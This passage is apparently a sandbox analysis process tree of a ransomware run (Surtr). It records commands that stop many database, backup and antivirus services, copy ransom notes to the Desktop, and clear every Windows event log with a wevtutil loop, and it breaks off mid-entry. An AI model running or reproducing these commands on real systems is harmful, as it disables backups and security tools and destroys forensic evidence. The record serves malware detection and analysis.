      net stop "MSOLAP$TPS"
      4⤵
      PID:2860
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$TPS"
        5⤵
        
        PID:2236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"
    3⤵
    PID:2416
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$TPSAMA"
      4⤵
      PID:224
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$TPSAMA"
        5⤵
        
        PID:232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"
    3⤵
    PID:1392
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$BKUPEXEC"
      4⤵
      PID:1692
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"
        5⤵
        
        PID:1736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"
    3⤵
    PID:1620
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$ECWDB2"
      4⤵
      PID:760
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$ECWDB2"
        5⤵
        
        PID:484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"
    3⤵
    PID:2412
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PRACTICEMGT"
      4⤵
      PID:2020
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"
        5⤵
        
        PID:1344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"
    3⤵
    PID:2888
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PRACTTICEBGC"
      4⤵
      PID:1824
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"
        5⤵
        
        PID:484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"
    3⤵
    PID:1620
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PROFXENGAGEMENT"
      4⤵
      PID:2924
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"
        5⤵
        
        PID:2756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"
    3⤵
    PID:3400
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SBSMONITORING"
      4⤵
      PID:2892
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"
        5⤵
        
        PID:3396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"
    3⤵
    PID:556
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SHAREPOINT"
      4⤵
      PID:1660
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"
        5⤵
        
        PID:3420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"
    3⤵
    PID:3332
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SQL_2008"
      4⤵
      PID:2932
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SQL_2008"
        5⤵
        
        PID:896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"
    3⤵
    PID:3632
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SYSTEM_BGC"
      4⤵
      PID:2140
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"
        5⤵
        
        PID:2388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"
    3⤵
    PID:3652
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$TPS"
      4⤵
      PID:1532
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$TPS"
        5⤵
        
        PID:2372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"
    3⤵
    PID:1080
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$TPSAMA"
      4⤵
      PID:536
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$TPSAMA"
        5⤵
        
        PID:1684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
    3⤵
    PID:2292
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$VEEAMSQL2008R2"
      4⤵
      PID:2896
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
        5⤵
        
        PID:2244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"
    3⤵
    PID:2904
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$VEEAMSQL2012"
      4⤵
      PID:584
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"
        5⤵
        
        PID:3676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"
    3⤵
    PID:3568
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher"
      4⤵
      PID:3596
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher"
        5⤵
        
        PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
    3⤵
    PID:3708
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
      4⤵
      PID:2344
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"
        5⤵
        
        PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"
    3⤵
    PID:1748
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SBSMONITORING"
      4⤵
      PID:2592
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"
        5⤵
        
        PID:1492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"
    3⤵
    PID:1756
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SHAREPOINT"
      4⤵
      PID:2460
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"
        5⤵
        
        PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"
    3⤵
    PID:1288
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SQL_2008"
      4⤵
      PID:1564
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"
        5⤵
        
        PID:704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"
    3⤵
    PID:2964
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SYSTEM_BGC"
      4⤵
      PID:3392
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"
        5⤵
        
        PID:3668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"
    3⤵
    PID:1492
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$TPS"
      4⤵
      PID:1528
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"
        5⤵
        
        PID:2992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"
    3⤵
    PID:2236
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$TPSAMA"
      4⤵
      PID:2212
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"
        5⤵
        
        PID:3436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"
    3⤵
    PID:3752
  - - C:\Windows\system32\net.exe
      net stop "MSSQLSERVER"
      4⤵
      PID:3856
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLSERVER"
        5⤵
        
        PID:3872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"
    3⤵
    PID:3896
  - - C:\Windows\system32\net.exe
      net stop "MSSQLServerADHelper100"
      4⤵
      PID:3920
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerADHelper100"
        5⤵
        
        PID:4044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"
    3⤵
    PID:3156
  - - C:\Windows\system32\net.exe
      net stop "MSSQLServerOLAPService"
      4⤵
      PID:3160
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerOLAPService"
        5⤵
        
        PID:3184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MySQL80"
    3⤵
    PID:560
  - - C:\Windows\system32\net.exe
      net stop "MySQL80"
      4⤵
      PID:3256
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MySQL80"
        5⤵
        
        PID:2832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MySQL57"
    3⤵
    PID:3260
  - - C:\Windows\system32\net.exe
      net stop "MySQL57"
      4⤵
      PID:2684
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MySQL57"
        5⤵
        
        PID:2652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"
    3⤵
    PID:3340
  - - C:\Windows\system32\net.exe
      net stop "OracleClientCache80"
      4⤵
      PID:2368
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "OracleClientCache80"
        5⤵
        
        PID:2320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "PDVFSService"
    3⤵
    PID:2960
  - - C:\Windows\system32\net.exe
      net stop "PDVFSService"
      4⤵
      PID:1288
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "PDVFSService"
        5⤵
        
        PID:1736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "POP3Svc"
    3⤵
    PID:2424
  - - C:\Windows\system32\net.exe
      net stop "POP3Svc"
      4⤵
      PID:988
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "POP3Svc"
        5⤵
        
        PID:1868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer"
    3⤵
    PID:2760
  - - C:\Windows\system32\net.exe
      net stop "ReportServer"
      4⤵
      PID:2540
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer"
        5⤵
        
        PID:1588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"
    3⤵
    PID:3172
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$SQL_2008"
      4⤵
      PID:3060
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$SQL_2008"
        5⤵
        
        PID:2520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"
    3⤵
    PID:4072
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$SYSTEM_BGC"
      4⤵
      PID:1484
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"
        5⤵
        
        PID:3368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"
    3⤵
    PID:3372
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$TPS"
      4⤵
      PID:2128
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$TPS"
        5⤵
        
        PID:1944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"
    3⤵
    PID:352
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$TPSAMA"
      4⤵
      PID:3016
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$TPSAMA"
        5⤵
        
        PID:3764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "RESvc"
    3⤵
    PID:3800
  - - C:\Windows\system32\net.exe
      net stop "RESvc"
      4⤵
      PID:3728
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "RESvc"
        5⤵
        
        PID:200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "sacsvr"
    3⤵
    PID:3708
  - - C:\Windows\system32\net.exe
      net stop "sacsvr"
      4⤵
      PID:1316
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "sacsvr"
        5⤵
        
        PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SamSs"
    3⤵
    PID:1552
  - - C:\Windows\system32\net.exe
      net stop "SamSs"
      4⤵
      PID:2908
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SamSs"
        5⤵
        
        PID:3428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SAVAdminService"
    3⤵
    PID:2680
  - - C:\Windows\system32\net.exe
      net stop "SAVAdminService"
      4⤵
      PID:2664
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SAVAdminService"
        5⤵
        
        PID:2972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SAVService"
    3⤵
    PID:2052
  - - C:\Windows\system32\net.exe
      net stop "SAVService"
      4⤵
      PID:2960
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SAVService"
        5⤵
        
        PID:1256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Smcinst"
    3⤵
    PID:2136
  - - C:\Windows\system32\net.exe
      net stop "Smcinst"
      4⤵
      PID:4080
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Smcinst"
        5⤵
        
        PID:4060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SmcService"
    3⤵
    PID:2656
  - - C:\Windows\system32\net.exe
      net stop "SmcService"
      4⤵
      PID:2500
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SmcService"
        5⤵
        
        PID:2028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SMTPSvc"
    3⤵
    PID:3564
  - - C:\Windows\system32\net.exe
      net stop "SMTPSvc"
      4⤵
      PID:2936
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SMTPSvc"
        5⤵
        
        PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SNAC"
    3⤵
    PID:3812
  - - C:\Windows\system32\net.exe
      net stop "SNAC"
      4⤵
      PID:3872
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SNAC"
        5⤵
        
        PID:3916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SntpService"
    3⤵
    PID:4040
  - - C:\Windows\system32\net.exe
      net stop "SntpService"
      4⤵
      PID:3984
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SntpService"
        5⤵
        
        PID:3932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "sophossps"
    3⤵
    PID:3912
  - - C:\Windows\system32\net.exe
      net stop "sophossps"
      4⤵
      PID:2188
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "sophossps"
        5⤵
        
        PID:3584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"
    3⤵
    PID:2024
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$BKUPEXEC"
      4⤵
      PID:2884
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"
        5⤵
        
        PID:3708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"
    3⤵
    PID:2712
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$ECWDB2"
      4⤵
      PID:1636
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$ECWDB2"
        5⤵
        
        PID:3428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"
    3⤵
    PID:1744
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PRACTTICEBGC"
      4⤵
      PID:5308
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"
        5⤵
        
        PID:5288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"
    3⤵
    PID:3540
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PRACTTICEMGT"
      4⤵
      PID:1392
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"
        5⤵
        
        PID:3648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"
    3⤵
    PID:1704
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PROFXENGAGEMENT"
      4⤵
      PID:4004
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"
        5⤵
        
        PID:2876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"
    3⤵
    PID:4144
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SBSMONITORING"
      4⤵
      PID:4100
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"
        5⤵
        
        PID:5844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"
    3⤵
    PID:5068
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SHAREPOINT"
      4⤵
      PID:6388
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"
        5⤵
        
        PID:5192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"
    3⤵
    PID:6424
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SQL_2008"
      4⤵
      PID:6464
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SQL_2008"
        5⤵
        
        PID:3484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"
    3⤵
    PID:1640
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SYSTEM_BGC"
      4⤵
      PID:3032
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"
        5⤵
        
        PID:1856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"
    3⤵
    PID:5444
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$TPS"
      4⤵
      PID:1532
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$TPS"
        5⤵
        
        PID:3816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"
    3⤵
    PID:4968
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$TPSAMA"
      4⤵
      PID:6708
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$TPSAMA"
        5⤵
        
        PID:5912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Private_DATA.surt" "%USERPROFILE%\Desktop\Private_DATA.surt"
    3⤵
    PID:848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\ID_DATA.surt" "%USERPROFILE%\Desktop\ID_DATA.surt"
    3⤵
    PID:2896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
    3⤵
    PID:2884
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$VEEAMSQL2008R2"
      4⤵
      PID:1824
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
        5⤵
        
        PID:3444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\SURTR_README.hta" "%USERPROFILE%\Desktop\SURTR_README.hta"
    3⤵
    PID:2744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Service\SURTR_README.txt" "%USERPROFILE%\Desktop\SURTR_README.txt"
    3⤵
    PID:484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
    3⤵
    PID:1552
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wevtutil.exe el
      4⤵
      PID:1912
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe el
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3996
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Analytic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2672
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Application"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1756
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "DebugChannel"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2624
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "DirectShowFilterGraph"
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:3900
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "DirectShowPluginControl"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4064
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Els_Hyphenation/Analytic"
      4⤵
      PID:3860
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "EndpointMapper"
      4⤵
      PID:2448
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "ForwardedEvents"
      4⤵
      PID:2076
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "HardwareEvents"
      4⤵
      PID:804
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Internet Explorer"
      4⤵
      Clears Windows event logs
      PID:376
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Key Management Service"
      4⤵
      PID:2756
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
      4⤵
      PID:1752
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Media Center"
      4⤵
      PID:4044
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationDeviceProxy"
      4⤵
      PID:1588
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationPerformance"
      4⤵
      PID:3212
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationPipeline"
      4⤵
      PID:3180
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationPlatform"
      4⤵
      PID:3152
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-IE/Diagnostic"
      4⤵
      PID:2548
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
      4⤵
      PID:2392
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
      4⤵
      PID:2900
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
      4⤵
      PID:3800
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
      4⤵
      PID:3668
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
      4⤵
      PID:2856
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
      4⤵
      PID:3148
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
      4⤵
      PID:352
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
      4⤵
      Clears Windows event logs
      PID:3376
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
      4⤵
      PID:1688
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
      4⤵
      PID:1724
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:3396
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
      4⤵
      PID:6180
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
      4⤵
      PID:6104
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
      4⤵
      PID:6192
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
      4⤵
      PID:6216
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
      4⤵
      PID:4004
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
      4⤵
      PID:4040
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
      4⤵
      PID:3904
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
      4⤵
      PID:4416
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
      4⤵
      PID:2012
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
      4⤵
      PID:4192
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
      4⤵
      PID:5252
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
      4⤵
      PID:4168
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
      4⤵
      PID:5940
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
      4⤵
      PID:6044
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
      4⤵
      PID:5828
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
      4⤵
      PID:5768
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
      4⤵
      PID:5644
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
      4⤵
      PID:5652
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
      4⤵
      PID:5508
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Backup"
      4⤵
      PID:4100
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
      4⤵
      PID:4808
  - - C:\Windows\system32\wevtutil.exe
